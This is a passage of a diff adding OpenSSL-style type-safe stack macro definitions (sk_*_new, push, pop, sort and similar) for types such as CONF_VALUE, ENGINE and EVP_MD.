+# define sk_CMS_SignerInfo_value(st, i) SKM_sk_value(CMS_SignerInfo, (st), (i))
+# define sk_CMS_SignerInfo_set(st, i, val) SKM_sk_set(CMS_SignerInfo, (st), (i), (val))
+# define sk_CMS_SignerInfo_zero(st) SKM_sk_zero(CMS_SignerInfo, (st))
+# define sk_CMS_SignerInfo_push(st, val) SKM_sk_push(CMS_SignerInfo, (st), (val))
+# define sk_CMS_SignerInfo_unshift(st, val) SKM_sk_unshift(CMS_SignerInfo, (st), (val))
+# define sk_CMS_SignerInfo_find(st, val) SKM_sk_find(CMS_SignerInfo, (st), (val))
+# define sk_CMS_SignerInfo_find_ex(st, val) SKM_sk_find_ex(CMS_SignerInfo, (st), (val))
+# define sk_CMS_SignerInfo_delete(st, i) SKM_sk_delete(CMS_SignerInfo, (st), (i))
+# define sk_CMS_SignerInfo_delete_ptr(st, ptr) SKM_sk_delete_ptr(CMS_SignerInfo, (st), (ptr))
+# define sk_CMS_SignerInfo_insert(st, val, i) SKM_sk_insert(CMS_SignerInfo, (st), (val), (i))
+# define sk_CMS_SignerInfo_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CMS_SignerInfo, (st), (cmp))
+# define sk_CMS_SignerInfo_dup(st) SKM_sk_dup(CMS_SignerInfo, st)
+# define sk_CMS_SignerInfo_pop_free(st, free_func) SKM_sk_pop_free(CMS_SignerInfo, (st), (free_func))
+# define sk_CMS_SignerInfo_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(CMS_SignerInfo, (st), (copy_func), (free_func))
+# define sk_CMS_SignerInfo_shift(st) SKM_sk_shift(CMS_SignerInfo, (st))
+# define sk_CMS_SignerInfo_pop(st) SKM_sk_pop(CMS_SignerInfo, (st))
+# define sk_CMS_SignerInfo_sort(st) SKM_sk_sort(CMS_SignerInfo, (st))
+# define sk_CMS_SignerInfo_is_sorted(st) SKM_sk_is_sorted(CMS_SignerInfo, (st))
+# define sk_CONF_IMODULE_new(cmp) SKM_sk_new(CONF_IMODULE, (cmp))
+# define sk_CONF_IMODULE_new_null() SKM_sk_new_null(CONF_IMODULE)
+# define sk_CONF_IMODULE_free(st) SKM_sk_free(CONF_IMODULE, (st))
+# define sk_CONF_IMODULE_num(st) SKM_sk_num(CONF_IMODULE, (st))
+# define sk_CONF_IMODULE_value(st, i) SKM_sk_value(CONF_IMODULE, (st), (i))
+# define sk_CONF_IMODULE_set(st, i, val) SKM_sk_set(CONF_IMODULE, (st), (i), (val))
+# define sk_CONF_IMODULE_zero(st) SKM_sk_zero(CONF_IMODULE, (st))
+# define sk_CONF_IMODULE_push(st, val) SKM_sk_push(CONF_IMODULE, (st), (val))
+# define sk_CONF_IMODULE_unshift(st, val) SKM_sk_unshift(CONF_IMODULE, (st), (val))
+# define sk_CONF_IMODULE_find(st, val) SKM_sk_find(CONF_IMODULE, (st), (val))
+# define sk_CONF_IMODULE_find_ex(st, val) SKM_sk_find_ex(CONF_IMODULE, (st), (val))
+# define sk_CONF_IMODULE_delete(st, i) SKM_sk_delete(CONF_IMODULE, (st), (i))
+# define sk_CONF_IMODULE_delete_ptr(st, ptr) SKM_sk_delete_ptr(CONF_IMODULE, (st), (ptr))
+# define sk_CONF_IMODULE_insert(st, val, i) SKM_sk_insert(CONF_IMODULE, (st), (val), (i))
+# define sk_CONF_IMODULE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CONF_IMODULE, (st), (cmp))
+# define sk_CONF_IMODULE_dup(st) SKM_sk_dup(CONF_IMODULE, st)
+# define sk_CONF_IMODULE_pop_free(st, free_func) SKM_sk_pop_free(CONF_IMODULE, (st), (free_func))
+# define sk_CONF_IMODULE_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(CONF_IMODULE, (st), (copy_func), (free_func))
+# define sk_CONF_IMODULE_shift(st) SKM_sk_shift(CONF_IMODULE, (st))
+# define sk_CONF_IMODULE_pop(st) SKM_sk_pop(CONF_IMODULE, (st))
+# define sk_CONF_IMODULE_sort(st) SKM_sk_sort(CONF_IMODULE, (st))
+# define sk_CONF_IMODULE_is_sorted(st) SKM_sk_is_sorted(CONF_IMODULE, (st))
+# define sk_CONF_MODULE_new(cmp) SKM_sk_new(CONF_MODULE, (cmp))
+# define sk_CONF_MODULE_new_null() SKM_sk_new_null(CONF_MODULE)
+# define sk_CONF_MODULE_free(st) SKM_sk_free(CONF_MODULE, (st))
+# define sk_CONF_MODULE_num(st) SKM_sk_num(CONF_MODULE, (st))
+# define sk_CONF_MODULE_value(st, i) SKM_sk_value(CONF_MODULE, (st), (i))
+# define sk_CONF_MODULE_set(st, i, val) SKM_sk_set(CONF_MODULE, (st), (i), (val))
+# define sk_CONF_MODULE_zero(st) SKM_sk_zero(CONF_MODULE, (st))
+# define sk_CONF_MODULE_push(st, val) SKM_sk_push(CONF_MODULE, (st), (val))
+# define sk_CONF_MODULE_unshift(st, val) SKM_sk_unshift(CONF_MODULE, (st), (val))
+# define sk_CONF_MODULE_find(st, val) SKM_sk_find(CONF_MODULE, (st), (val))
+# define sk_CONF_MODULE_find_ex(st, val) SKM_sk_find_ex(CONF_MODULE, (st), (val))
+# define sk_CONF_MODULE_delete(st, i) SKM_sk_delete(CONF_MODULE, (st), (i))
+# define sk_CONF_MODULE_delete_ptr(st, ptr) SKM_sk_delete_ptr(CONF_MODULE, (st), (ptr))
+# define sk_CONF_MODULE_insert(st, val, i) SKM_sk_insert(CONF_MODULE, (st), (val), (i))
+# define sk_CONF_MODULE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CONF_MODULE, (st), (cmp))
+# define sk_CONF_MODULE_dup(st) SKM_sk_dup(CONF_MODULE, st)
+# define sk_CONF_MODULE_pop_free(st, free_func) SKM_sk_pop_free(CONF_MODULE, (st), (free_func))
+# define sk_CONF_MODULE_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(CONF_MODULE, (st), (copy_func), (free_func))
+# define sk_CONF_MODULE_shift(st) SKM_sk_shift(CONF_MODULE, (st))
+# define sk_CONF_MODULE_pop(st) SKM_sk_pop(CONF_MODULE, (st))
+# define sk_CONF_MODULE_sort(st) SKM_sk_sort(CONF_MODULE, (st))
+# define sk_CONF_MODULE_is_sorted(st) SKM_sk_is_sorted(CONF_MODULE, (st))
+# define sk_CONF_VALUE_new(cmp) SKM_sk_new(CONF_VALUE, (cmp))
+# define sk_CONF_VALUE_new_null() SKM_sk_new_null(CONF_VALUE)
+# define sk_CONF_VALUE_free(st) SKM_sk_free(CONF_VALUE, (st))
+# define sk_CONF_VALUE_num(st) SKM_sk_num(CONF_VALUE, (st))
+# define sk_CONF_VALUE_value(st, i) SKM_sk_value(CONF_VALUE, (st), (i))
+# define sk_CONF_VALUE_set(st, i, val) SKM_sk_set(CONF_VALUE, (st), (i), (val))
+# define sk_CONF_VALUE_zero(st) SKM_sk_zero(CONF_VALUE, (st))
+# define sk_CONF_VALUE_push(st, val) SKM_sk_push(CONF_VALUE, (st), (val))
+# define sk_CONF_VALUE_unshift(st, val) SKM_sk_unshift(CONF_VALUE, (st), (val))
+# define sk_CONF_VALUE_find(st, val) SKM_sk_find(CONF_VALUE, (st), (val))
+# define sk_CONF_VALUE_find_ex(st, val) SKM_sk_find_ex(CONF_VALUE, (st), (val))
+# define sk_CONF_VALUE_delete(st, i) SKM_sk_delete(CONF_VALUE, (st), (i))
+# define sk_CONF_VALUE_delete_ptr(st, ptr) SKM_sk_delete_ptr(CONF_VALUE, (st), (ptr))
+# define sk_CONF_VALUE_insert(st, val, i) SKM_sk_insert(CONF_VALUE, (st), (val), (i))
+# define sk_CONF_VALUE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CONF_VALUE, (st), (cmp))
+# define sk_CONF_VALUE_dup(st) SKM_sk_dup(CONF_VALUE, st)
+# define sk_CONF_VALUE_pop_free(st, free_func) SKM_sk_pop_free(CONF_VALUE, (st), (free_func))
+# define sk_CONF_VALUE_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(CONF_VALUE, (st), (copy_func), (free_func))
+# define sk_CONF_VALUE_shift(st) SKM_sk_shift(CONF_VALUE, (st))
+# define sk_CONF_VALUE_pop(st) SKM_sk_pop(CONF_VALUE, (st))
+# define sk_CONF_VALUE_sort(st) SKM_sk_sort(CONF_VALUE, (st))
+# define sk_CONF_VALUE_is_sorted(st) SKM_sk_is_sorted(CONF_VALUE, (st))
+# define sk_CRYPTO_EX_DATA_FUNCS_new(cmp) SKM_sk_new(CRYPTO_EX_DATA_FUNCS, (cmp))
+# define sk_CRYPTO_EX_DATA_FUNCS_new_null() SKM_sk_new_null(CRYPTO_EX_DATA_FUNCS)
+# define sk_CRYPTO_EX_DATA_FUNCS_free(st) SKM_sk_free(CRYPTO_EX_DATA_FUNCS, (st))
+# define sk_CRYPTO_EX_DATA_FUNCS_num(st) SKM_sk_num(CRYPTO_EX_DATA_FUNCS, (st))
+# define sk_CRYPTO_EX_DATA_FUNCS_value(st, i) SKM_sk_value(CRYPTO_EX_DATA_FUNCS, (st), (i))
+# define sk_CRYPTO_EX_DATA_FUNCS_set(st, i, val) SKM_sk_set(CRYPTO_EX_DATA_FUNCS, (st), (i), (val))
+# define sk_CRYPTO_EX_DATA_FUNCS_zero(st) SKM_sk_zero(CRYPTO_EX_DATA_FUNCS, (st))
+# define sk_CRYPTO_EX_DATA_FUNCS_push(st, val) SKM_sk_push(CRYPTO_EX_DATA_FUNCS, (st), (val))
+# define sk_CRYPTO_EX_DATA_FUNCS_unshift(st, val) SKM_sk_unshift(CRYPTO_EX_DATA_FUNCS, (st), (val))
+# define sk_CRYPTO_EX_DATA_FUNCS_find(st, val) SKM_sk_find(CRYPTO_EX_DATA_FUNCS, (st), (val))
+# define sk_CRYPTO_EX_DATA_FUNCS_find_ex(st, val) SKM_sk_find_ex(CRYPTO_EX_DATA_FUNCS, (st), (val))
+# define sk_CRYPTO_EX_DATA_FUNCS_delete(st, i) SKM_sk_delete(CRYPTO_EX_DATA_FUNCS, (st), (i))
+# define sk_CRYPTO_EX_DATA_FUNCS_delete_ptr(st, ptr) SKM_sk_delete_ptr(CRYPTO_EX_DATA_FUNCS, (st), (ptr))
+# define sk_CRYPTO_EX_DATA_FUNCS_insert(st, val, i) SKM_sk_insert(CRYPTO_EX_DATA_FUNCS, (st), (val), (i))
+# define sk_CRYPTO_EX_DATA_FUNCS_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CRYPTO_EX_DATA_FUNCS, (st), (cmp))
+# define sk_CRYPTO_EX_DATA_FUNCS_dup(st) SKM_sk_dup(CRYPTO_EX_DATA_FUNCS, st)
+# define sk_CRYPTO_EX_DATA_FUNCS_pop_free(st, free_func) SKM_sk_pop_free(CRYPTO_EX_DATA_FUNCS, (st), (free_func))
+# define sk_CRYPTO_EX_DATA_FUNCS_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(CRYPTO_EX_DATA_FUNCS, (st), (copy_func), (free_func))
+# define sk_CRYPTO_EX_DATA_FUNCS_shift(st) SKM_sk_shift(CRYPTO_EX_DATA_FUNCS, (st))
+# define sk_CRYPTO_EX_DATA_FUNCS_pop(st) SKM_sk_pop(CRYPTO_EX_DATA_FUNCS, (st))
+# define sk_CRYPTO_EX_DATA_FUNCS_sort(st) SKM_sk_sort(CRYPTO_EX_DATA_FUNCS, (st))
+# define sk_CRYPTO_EX_DATA_FUNCS_is_sorted(st) SKM_sk_is_sorted(CRYPTO_EX_DATA_FUNCS, (st))
+# define sk_CRYPTO_dynlock_new(cmp) SKM_sk_new(CRYPTO_dynlock, (cmp))
+# define sk_CRYPTO_dynlock_new_null() SKM_sk_new_null(CRYPTO_dynlock)
+# define sk_CRYPTO_dynlock_free(st) SKM_sk_free(CRYPTO_dynlock, (st))
+# define sk_CRYPTO_dynlock_num(st) SKM_sk_num(CRYPTO_dynlock, (st))
+# define sk_CRYPTO_dynlock_value(st, i) SKM_sk_value(CRYPTO_dynlock, (st), (i))
+# define sk_CRYPTO_dynlock_set(st, i, val) SKM_sk_set(CRYPTO_dynlock, (st), (i), (val))
+# define sk_CRYPTO_dynlock_zero(st) SKM_sk_zero(CRYPTO_dynlock, (st))
+# define sk_CRYPTO_dynlock_push(st, val) SKM_sk_push(CRYPTO_dynlock, (st), (val))
+# define sk_CRYPTO_dynlock_unshift(st, val) SKM_sk_unshift(CRYPTO_dynlock, (st), (val))
+# define sk_CRYPTO_dynlock_find(st, val) SKM_sk_find(CRYPTO_dynlock, (st), (val))
+# define sk_CRYPTO_dynlock_find_ex(st, val) SKM_sk_find_ex(CRYPTO_dynlock, (st), (val))
+# define sk_CRYPTO_dynlock_delete(st, i) SKM_sk_delete(CRYPTO_dynlock, (st), (i))
+# define sk_CRYPTO_dynlock_delete_ptr(st, ptr) SKM_sk_delete_ptr(CRYPTO_dynlock, (st), (ptr))
+# define sk_CRYPTO_dynlock_insert(st, val, i) SKM_sk_insert(CRYPTO_dynlock, (st), (val), (i))
+# define sk_CRYPTO_dynlock_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CRYPTO_dynlock, (st), (cmp))
+# define sk_CRYPTO_dynlock_dup(st) SKM_sk_dup(CRYPTO_dynlock, st)
+# define sk_CRYPTO_dynlock_pop_free(st, free_func) SKM_sk_pop_free(CRYPTO_dynlock, (st), (free_func))
+# define sk_CRYPTO_dynlock_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(CRYPTO_dynlock, (st), (copy_func), (free_func))
+# define sk_CRYPTO_dynlock_shift(st) SKM_sk_shift(CRYPTO_dynlock, (st))
+# define sk_CRYPTO_dynlock_pop(st) SKM_sk_pop(CRYPTO_dynlock, (st))
+# define sk_CRYPTO_dynlock_sort(st) SKM_sk_sort(CRYPTO_dynlock, (st))
+# define sk_CRYPTO_dynlock_is_sorted(st) SKM_sk_is_sorted(CRYPTO_dynlock, (st))
+# define sk_DIST_POINT_new(cmp) SKM_sk_new(DIST_POINT, (cmp))
+# define sk_DIST_POINT_new_null() SKM_sk_new_null(DIST_POINT)
+# define sk_DIST_POINT_free(st) SKM_sk_free(DIST_POINT, (st))
+# define sk_DIST_POINT_num(st) SKM_sk_num(DIST_POINT, (st))
+# define sk_DIST_POINT_value(st, i) SKM_sk_value(DIST_POINT, (st), (i))
+# define sk_DIST_POINT_set(st, i, val) SKM_sk_set(DIST_POINT, (st), (i), (val))
+# define sk_DIST_POINT_zero(st) SKM_sk_zero(DIST_POINT, (st))
+# define sk_DIST_POINT_push(st, val) SKM_sk_push(DIST_POINT, (st), (val))
+# define sk_DIST_POINT_unshift(st, val) SKM_sk_unshift(DIST_POINT, (st), (val))
+# define sk_DIST_POINT_find(st, val) SKM_sk_find(DIST_POINT, (st), (val))
+# define sk_DIST_POINT_find_ex(st, val) SKM_sk_find_ex(DIST_POINT, (st), (val))
+# define sk_DIST_POINT_delete(st, i) SKM_sk_delete(DIST_POINT, (st), (i))
+# define sk_DIST_POINT_delete_ptr(st, ptr) SKM_sk_delete_ptr(DIST_POINT, (st), (ptr))
+# define sk_DIST_POINT_insert(st, val, i) SKM_sk_insert(DIST_POINT, (st), (val), (i))
+# define sk_DIST_POINT_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(DIST_POINT, (st), (cmp))
+# define sk_DIST_POINT_dup(st) SKM_sk_dup(DIST_POINT, st)
+# define sk_DIST_POINT_pop_free(st, free_func) SKM_sk_pop_free(DIST_POINT, (st), (free_func))
+# define sk_DIST_POINT_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(DIST_POINT, (st), (copy_func), (free_func))
+# define sk_DIST_POINT_shift(st) SKM_sk_shift(DIST_POINT, (st))
+# define sk_DIST_POINT_pop(st) SKM_sk_pop(DIST_POINT, (st))
+# define sk_DIST_POINT_sort(st) SKM_sk_sort(DIST_POINT, (st))
+# define sk_DIST_POINT_is_sorted(st) SKM_sk_is_sorted(DIST_POINT, (st))
+# define sk_ENGINE_new(cmp) SKM_sk_new(ENGINE, (cmp))
+# define sk_ENGINE_new_null() SKM_sk_new_null(ENGINE)
+# define sk_ENGINE_free(st) SKM_sk_free(ENGINE, (st))
+# define sk_ENGINE_num(st) SKM_sk_num(ENGINE, (st))
+# define sk_ENGINE_value(st, i) SKM_sk_value(ENGINE, (st), (i))
+# define sk_ENGINE_set(st, i, val) SKM_sk_set(ENGINE, (st), (i), (val))
+# define sk_ENGINE_zero(st) SKM_sk_zero(ENGINE, (st))
+# define sk_ENGINE_push(st, val) SKM_sk_push(ENGINE, (st), (val))
+# define sk_ENGINE_unshift(st, val) SKM_sk_unshift(ENGINE, (st), (val))
+# define sk_ENGINE_find(st, val) SKM_sk_find(ENGINE, (st), (val))
+# define sk_ENGINE_find_ex(st, val) SKM_sk_find_ex(ENGINE, (st), (val))
+# define sk_ENGINE_delete(st, i) SKM_sk_delete(ENGINE, (st), (i))
+# define sk_ENGINE_delete_ptr(st, ptr) SKM_sk_delete_ptr(ENGINE, (st), (ptr))
+# define sk_ENGINE_insert(st, val, i) SKM_sk_insert(ENGINE, (st), (val), (i))
+# define sk_ENGINE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ENGINE, (st), (cmp))
+# define sk_ENGINE_dup(st) SKM_sk_dup(ENGINE, st)
+# define sk_ENGINE_pop_free(st, free_func) SKM_sk_pop_free(ENGINE, (st), (free_func))
+# define sk_ENGINE_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(ENGINE, (st), (copy_func), (free_func))
+# define sk_ENGINE_shift(st) SKM_sk_shift(ENGINE, (st))
+# define sk_ENGINE_pop(st) SKM_sk_pop(ENGINE, (st))
+# define sk_ENGINE_sort(st) SKM_sk_sort(ENGINE, (st))
+# define sk_ENGINE_is_sorted(st) SKM_sk_is_sorted(ENGINE, (st))
+# define sk_ENGINE_CLEANUP_ITEM_new(cmp) SKM_sk_new(ENGINE_CLEANUP_ITEM, (cmp))
+# define sk_ENGINE_CLEANUP_ITEM_new_null() SKM_sk_new_null(ENGINE_CLEANUP_ITEM)
+# define sk_ENGINE_CLEANUP_ITEM_free(st) SKM_sk_free(ENGINE_CLEANUP_ITEM, (st))
+# define sk_ENGINE_CLEANUP_ITEM_num(st) SKM_sk_num(ENGINE_CLEANUP_ITEM, (st))
+# define sk_ENGINE_CLEANUP_ITEM_value(st, i) SKM_sk_value(ENGINE_CLEANUP_ITEM, (st), (i))
+# define sk_ENGINE_CLEANUP_ITEM_set(st, i, val) SKM_sk_set(ENGINE_CLEANUP_ITEM, (st), (i), (val))
+# define sk_ENGINE_CLEANUP_ITEM_zero(st) SKM_sk_zero(ENGINE_CLEANUP_ITEM, (st))
+# define sk_ENGINE_CLEANUP_ITEM_push(st, val) SKM_sk_push(ENGINE_CLEANUP_ITEM, (st), (val))
+# define sk_ENGINE_CLEANUP_ITEM_unshift(st, val) SKM_sk_unshift(ENGINE_CLEANUP_ITEM, (st), (val))
+# define sk_ENGINE_CLEANUP_ITEM_find(st, val) SKM_sk_find(ENGINE_CLEANUP_ITEM, (st), (val))
+# define sk_ENGINE_CLEANUP_ITEM_find_ex(st, val) SKM_sk_find_ex(ENGINE_CLEANUP_ITEM, (st), (val))
+# define sk_ENGINE_CLEANUP_ITEM_delete(st, i) SKM_sk_delete(ENGINE_CLEANUP_ITEM, (st), (i))
+# define sk_ENGINE_CLEANUP_ITEM_delete_ptr(st, ptr) SKM_sk_delete_ptr(ENGINE_CLEANUP_ITEM, (st), (ptr))
+# define sk_ENGINE_CLEANUP_ITEM_insert(st, val, i) SKM_sk_insert(ENGINE_CLEANUP_ITEM, (st), (val), (i))
+# define sk_ENGINE_CLEANUP_ITEM_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ENGINE_CLEANUP_ITEM, (st), (cmp))
+# define sk_ENGINE_CLEANUP_ITEM_dup(st) SKM_sk_dup(ENGINE_CLEANUP_ITEM, st)
+# define sk_ENGINE_CLEANUP_ITEM_pop_free(st, free_func) SKM_sk_pop_free(ENGINE_CLEANUP_ITEM, (st), (free_func))
+# define sk_ENGINE_CLEANUP_ITEM_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(ENGINE_CLEANUP_ITEM, (st), (copy_func), (free_func))
+# define sk_ENGINE_CLEANUP_ITEM_shift(st) SKM_sk_shift(ENGINE_CLEANUP_ITEM, (st))
+# define sk_ENGINE_CLEANUP_ITEM_pop(st) SKM_sk_pop(ENGINE_CLEANUP_ITEM, (st))
+# define sk_ENGINE_CLEANUP_ITEM_sort(st) SKM_sk_sort(ENGINE_CLEANUP_ITEM, (st))
+# define sk_ENGINE_CLEANUP_ITEM_is_sorted(st) SKM_sk_is_sorted(ENGINE_CLEANUP_ITEM, (st))
+# define sk_ESS_CERT_ID_new(cmp) SKM_sk_new(ESS_CERT_ID, (cmp))
+# define sk_ESS_CERT_ID_new_null() SKM_sk_new_null(ESS_CERT_ID)
+# define sk_ESS_CERT_ID_free(st) SKM_sk_free(ESS_CERT_ID, (st))
+# define sk_ESS_CERT_ID_num(st) SKM_sk_num(ESS_CERT_ID, (st))
+# define sk_ESS_CERT_ID_value(st, i) SKM_sk_value(ESS_CERT_ID, (st), (i))
+# define sk_ESS_CERT_ID_set(st, i, val) SKM_sk_set(ESS_CERT_ID, (st), (i), (val))
+# define sk_ESS_CERT_ID_zero(st) SKM_sk_zero(ESS_CERT_ID, (st))
+# define sk_ESS_CERT_ID_push(st, val) SKM_sk_push(ESS_CERT_ID, (st), (val))
+# define sk_ESS_CERT_ID_unshift(st, val) SKM_sk_unshift(ESS_CERT_ID, (st), (val))
+# define sk_ESS_CERT_ID_find(st, val) SKM_sk_find(ESS_CERT_ID, (st), (val))
+# define sk_ESS_CERT_ID_find_ex(st, val) SKM_sk_find_ex(ESS_CERT_ID, (st), (val))
+# define sk_ESS_CERT_ID_delete(st, i) SKM_sk_delete(ESS_CERT_ID, (st), (i))
+# define sk_ESS_CERT_ID_delete_ptr(st, ptr) SKM_sk_delete_ptr(ESS_CERT_ID, (st), (ptr))
+# define sk_ESS_CERT_ID_insert(st, val, i) SKM_sk_insert(ESS_CERT_ID, (st), (val), (i))
+# define sk_ESS_CERT_ID_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ESS_CERT_ID, (st), (cmp))
+# define sk_ESS_CERT_ID_dup(st) SKM_sk_dup(ESS_CERT_ID, st)
+# define sk_ESS_CERT_ID_pop_free(st, free_func) SKM_sk_pop_free(ESS_CERT_ID, (st), (free_func))
+# define sk_ESS_CERT_ID_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(ESS_CERT_ID, (st), (copy_func), (free_func))
+# define sk_ESS_CERT_ID_shift(st) SKM_sk_shift(ESS_CERT_ID, (st))
+# define sk_ESS_CERT_ID_pop(st) SKM_sk_pop(ESS_CERT_ID, (st))
+# define sk_ESS_CERT_ID_sort(st) SKM_sk_sort(ESS_CERT_ID, (st))
+# define sk_ESS_CERT_ID_is_sorted(st) SKM_sk_is_sorted(ESS_CERT_ID, (st))
+# define sk_EVP_MD_new(cmp) SKM_sk_new(EVP_MD, (cmp))
+# define sk_EVP_MD_new_null() SKM_sk_new_null(EVP_MD)
+# define sk_EVP_MD_free(st) SKM_sk_free(EVP_MD, (st))
+# define sk_EVP_MD_num(st) SKM_sk_num(EVP_MD, (st))
+# define sk_EVP_MD_value(st, i) SKM_sk_value(EVP_MD, (st), (i))
+# define sk_EVP_MD_set(st, i, val) SKM_sk_set(EVP_MD, (st), (i), (val))
+# define sk_EVP_MD_zero(st) SKM_sk_zero(EVP_MD, (st))
+# define sk_EVP_MD_push(st, val) SKM_sk_push(EVP_MD, (st), (val))
+# define sk_EVP_MD_unshift(st, val) SKM_sk_unshift(EVP_MD, (st), (val))
+# define sk_EVP_MD_find(st, val) SKM_sk_find(EVP_MD, (st), (val))
+# define sk_EVP_MD_find_ex(st, val) SKM_sk_find_ex(EVP_MD, (st), (val))
+# define sk_EVP_MD_delete(st, i) SKM_sk_delete(EVP_MD, (st), (i))
+# define sk_EVP_MD_delete_ptr(st, ptr) SKM_sk_delete_ptr(EVP_MD, (st), (ptr))
+# define sk_EVP_MD_insert(st, val, i) SKM_sk_insert(EVP_MD, (st), (val), (i))
+# define sk_EVP_MD_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(EVP_MD, (st), (cmp))
+# define sk_EVP_MD_dup(st) SKM_sk_dup(EVP_MD, st)
+# define sk_EVP_MD_pop_free(st, free_func) SKM_sk_pop_free(EVP_MD, (st), (free_func))
+# define sk_EVP_MD_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(EVP_MD, (st), (copy_func), (free_func))
+# define sk_EVP_MD_shift(st) SKM_sk_shift(EVP_MD, (st))
+# define sk_EVP_MD_pop(st) SKM_sk_pop(EVP_MD, (st))
+# define sk_EVP_MD_sort(st) SKM_sk_sort(EVP_MD, (st))
+# define sk_EVP_MD_is_sorted(st) SKM_sk_is_sorted(EVP_MD, (st))
+# define sk_EVP_PBE_CTL_new(cmp) SKM_sk_new(EVP_PBE_CTL, (cmp))
+# define sk_EVP_PBE_CTL_new_null() SKM_sk_new_null(EVP_PBE_CTL)
+# define sk_EVP_PBE_CTL_free(st) SKM_sk_free(EVP_PBE_CTL, (st))
+# define sk_EVP_PBE_CTL_num(st) SKM_sk_num(EVP_PBE_CTL, (st))
+# define sk_EVP_PBE_CTL_value(st, i) SKM_sk_value(EVP_PBE_CTL, (st), (i))
+# define sk_EVP_PBE_CTL_set(st, i, val) SKM_sk_set(EVP_PBE_CTL, (st), (i), (val))
+# define sk_EVP_PBE_CTL_zero(st) SKM_sk_zero(EVP_PBE_CTL, (st))
+# define sk_EVP_PBE_CTL_push(st, val) SKM_sk_push(EVP_PBE_CTL, (st), (val))
+# define sk_EVP_PBE_CTL_unshift(st, val) SKM_sk_unshift(EVP_PBE_CTL, (st), (val))
+# define sk_EVP_PBE_CTL_find(st, val) SKM_sk_find(EVP_PBE_CTL, (st), (val))
+# define sk_EVP_PBE_CTL_find_ex(st, val) SKM_sk_find_ex(EVP_PBE_CTL, (st), (val))
+# define sk_EVP_PBE_CTL_delete(st, i) SKM_sk_delete(EVP_PBE_CTL, (st), (i))
+# define sk_EVP_PBE_CTL_delete_ptr(st, ptr) SKM_sk_delete_ptr(EVP_PBE_CTL, (st), (ptr))
+# define sk_EVP_PBE_CTL_insert(st, val, i) SKM_sk_insert(EVP_PBE_CTL, (st), (val), (i))
+# define sk_EVP_PBE_CTL_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(EVP_PBE_CTL, (st), (cmp))
+# define sk_EVP_PBE_CTL_dup(st) SKM_sk_dup(EVP_PBE_CTL, st)
+# define sk_EVP_PBE_CTL_pop_free(st, free_func) SKM_sk_pop_free(EVP_PBE_CTL, (st), (free_func))
+# define sk_EVP_PBE_CTL_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(EVP_PBE_CTL, (st), (copy_func), (free_func))
+# define sk_EVP_PBE_CTL_shift(st) SKM_sk_shift(EVP_PBE_CTL, (st))
+# define sk_EVP_PBE_CTL_pop(st) SKM_sk_pop(EVP_PBE_CTL, (st))
+# define sk_EVP_PBE_CTL_sort(st) SKM_sk_sort(EVP_PBE_CTL, (st))
+# define sk_EVP_PBE_CTL_is_sorted(st) SKM_sk_is_sorted(EVP_PBE_CTL, (st))
+# define sk_EVP_PKEY_ASN1_METHOD_new(cmp) SKM_sk_new(EVP_PKEY_ASN1_METHOD, (cmp))
+# define sk_EVP_PKEY_ASN1_METHOD_new_null() SKM_sk_new_null(EVP_PKEY_ASN1_METHOD)
+# define sk_EVP_PKEY_ASN1_METHOD_free(st) SKM_sk_free(EVP_PKEY_ASN1_METHOD, (st))
+# define sk_EVP_PKEY_ASN1_METHOD_num(st) SKM_sk_num(EVP_PKEY_ASN1_METHOD, (st))
+# define sk_EVP_PKEY_ASN1_METHOD_value(st, i) SKM_sk_value(EVP_PKEY_ASN1_METHOD, (st), (i))
+# define sk_EVP_PKEY_ASN1_METHOD_set(st, i, val) SKM_sk_set(EVP_PKEY_ASN1_METHOD, (st), (i), (val))
+# define sk_EVP_PKEY_ASN1_METHOD_zero(st) SKM_sk_zero(EVP_PKEY_ASN1_METHOD, (st))
+# define sk_EVP_PKEY_ASN1_METHOD_push(st, val) SKM_sk_push(EVP_PKEY_ASN1_METHOD, (st), (val))
+# define sk_EVP_PKEY_ASN1_METHOD_unshift(st, val) SKM_sk_unshift(EVP_PKEY_ASN1_METHOD, (st), (val))
+# define sk_EVP_PKEY_ASN1_METHOD_find(st, val) SKM_sk_find(EVP_PKEY_ASN1_METHOD, (st), (val))
+# define sk_EVP_PKEY_ASN1_METHOD_find_ex(st, val) SKM_sk_find_ex(EVP_PKEY_ASN1_METHOD, (st), (val))
+# define sk_EVP_PKEY_ASN1_METHOD_delete(st, i) SKM_sk_delete(EVP_PKEY_ASN1_METHOD, (st), (i))
+# define sk_EVP_PKEY_ASN1_METHOD_delete_ptr(st, ptr) SKM_sk_delete_ptr(EVP_PKEY_ASN1_METHOD, (st), (ptr))
+# define sk_EVP_PKEY_ASN1_METHOD_insert(st, val, i) SKM_sk_insert(EVP_PKEY_ASN1_METHOD, (st), (val), (i))
+# define sk_EVP_PKEY_ASN1_METHOD_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(EVP_PKEY_ASN1_METHOD, (st), (cmp))
+# define sk_EVP_PKEY_ASN1_METHOD_dup(st) SKM_sk_dup(EVP_PKEY_ASN1_METHOD, st)
+# define sk_EVP_PKEY_ASN1_METHOD_pop_free(st, free_func) SKM_sk_pop_free(EVP_PKEY_ASN1_METHOD, (st), (free_func))
+# define sk_EVP_PKEY_ASN1_METHOD_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(EVP_PKEY_ASN1_METHOD, (st), (copy_func), (free_func))
